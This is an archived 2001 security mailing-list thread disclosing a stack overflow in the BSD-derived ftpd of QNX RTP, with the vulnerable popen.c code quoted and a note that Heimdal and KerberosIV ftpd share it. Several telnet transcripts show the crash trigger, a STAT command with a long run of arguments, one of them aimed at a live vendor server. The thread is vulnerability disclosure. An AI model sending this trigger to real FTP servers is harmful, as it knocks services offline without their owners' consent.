Re: QNX RTP ftpd stack overflow
In the profound words of Przemyslaw Frasunek: > > On Fri, Feb 02, 2001 at 03:08:12PM -0800, Ted U wrote: > > tested on qnx rtp as released on jan. 18 from get.qnx.com. doesn't work. > > i tried significantly more a's and nothing happens. i get the normal > > repsonse from stat. > > Are you sure? This is output from the same version of QNX RTP, downloaded > yesterday from get.qnx.com: > > riget:venglin:~> telnet cipsko 21 > Trying 192.168.1.32... > Connected to cipsko.gadaczka.org. > Escape character is '^]'. > 220 cipsko FTP server (Version 5.60) ready. > user venglin > 331 Password required for venglin. > pass x > 230 User venglin logged in. > stat a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a >a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a >a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a >a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a >a a a a a a a a a a a a a a a a a > Connection closed by foreign host. I can't speak for the downloadable QNX RTP, however I confirmed this same behavior with the FTP server that ships with QNX 4.25 (their highly expensive previous RTOS, which is NOT available for free download)... The FTP server also reports the same "Version 5.60", so I imagine they are one and the same, anyway... -- |||| ||Rob Seace|| URL || [EMAIL PROTECTED] || || AKA: Agrajag || http://www.magrathea.com/~ras/ || [EMAIL PROTECTED] || |||| "In those days spirits were brave, the stakes were high, men were real men, women were real women and small furry creatures from Alpha Centauri were real small furry creatures from Alpha Centauri." - THGTTG
Re: QNX RTP ftpd stack overflow
On Fri, Feb 02, 2001 at 03:08:12PM -0800, Ted U wrote: > tested on qnx rtp as released on jan. 18 from get.qnx.com. doesn't work. > i tried significantly more a's and nothing happens. i get the normal > repsonse from stat. Are you sure? This is output from the same version of QNX RTP, downloaded yesterday from get.qnx.com: riget:venglin:~> telnet cipsko 21 Trying 192.168.1.32... Connected to cipsko.gadaczka.org. Escape character is '^]'. 220 cipsko FTP server (Version 5.60) ready. user venglin 331 Password required for venglin. pass x 230 User venglin logged in. stat a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a Connection closed by foreign host. -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: [EMAIL PROTECTED] ** PGP: D48684904685DF43EA93AFA13BE170BF *
Re: QNX RTP ftpd stack overflow
tested on qnx rtp as released on jan. 18 from get.qnx.com. doesn't work. i tried significantly more a's and nothing happens. i get the normal repsonse from stat. /-\ / Ted Unangst - [EMAIL PROTECTED] http://heorot.stanford.edu \ /"If you don't believe in the existence of evil, you have a lot to learn."\
Re: QNX RTP ftpd stack overflow
On Fri, Feb 02, 2001 at 03:04:31PM -0800, Kris Kennaway wrote:
> > BTW. Old BSD derived ftpd is also used in opieftpd and SSLftpd. Both are
> > vulnerable to this attack.
> In case anyone is wondering how old is old:
The same problem persists in heimdal / kerberosIV ftpd implementation:
heimdal/appl/ftp/ftpd/popen.c and kerberosIV/appl/ftp/ftpd/popen.c:
char **pop, *argv[100], *gargv[1000];
/* break up string into pieces */
foo = NULL;
for (argc = 0, cp = program;; cp = NULL) {
if (!(argv[argc++] = strtok_r(cp, " \t\n", &foo)))
break;
}
Both are based on BSD derived ftpd version 6.00.
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: [EMAIL PROTECTED] ** PGP: D48684904685DF43EA93AFA13BE170BF *
Re: QNX RTP ftpd stack overflow
On Fri, Feb 02, 2001 at 08:03:09PM +0100, Przemyslaw Frasunek wrote: > BTW. Old BSD derived ftpd is also used in opieftpd and SSLftpd. Both are > vulnerable to this attack. In case anyone is wondering how old is old: revision 1.5 date: 1996/11/20 22:12:50; author: pst; state: Exp; lines: +9 -5 Truncate argument list to avoid buffer overflows. Cannidate for: 2.1 and 2.2 Kris PGP signature
QNX RTP ftpd stack overflow
QNX RTP uses a BSD derived FTP server, which is vulnerable to strtok()
based stack overflow.
Offending code from ftpd/popen.c:
char **pop, *argv[100], *gargv[1000], *vv[2];
for (argc = 0, cp = program;; cp = NULL)
if (!(argv[argc++] = strtok(cp, " \t\n")))
break;
/* glob each piece */
gargv[0] = argv[0];
for (gargc = argc = 1; argv[argc]; argc++) {
argv[argc] = strdup(argv[argc]);
Code is called, when STAT command is issued. Overflow occurs, when large
number of arguments is applied.
Identifing vulnerable system:
220 quics.qnx.com FTP server (Version 5.60) ready.
user ftp
331 Guest login ok, send ident as password.
pass dupa
230 Guest login ok, access restrictions apply.
stat a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a
Connection closed by foreign host.
BTW. Old BSD derived ftpd is also used in opieftpd and SSLftpd. Both are
vulnerable to this attack.
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: [EMAIL PROTECTED] ** PGP: D48684904685DF43EA93AFA13BE170BF *
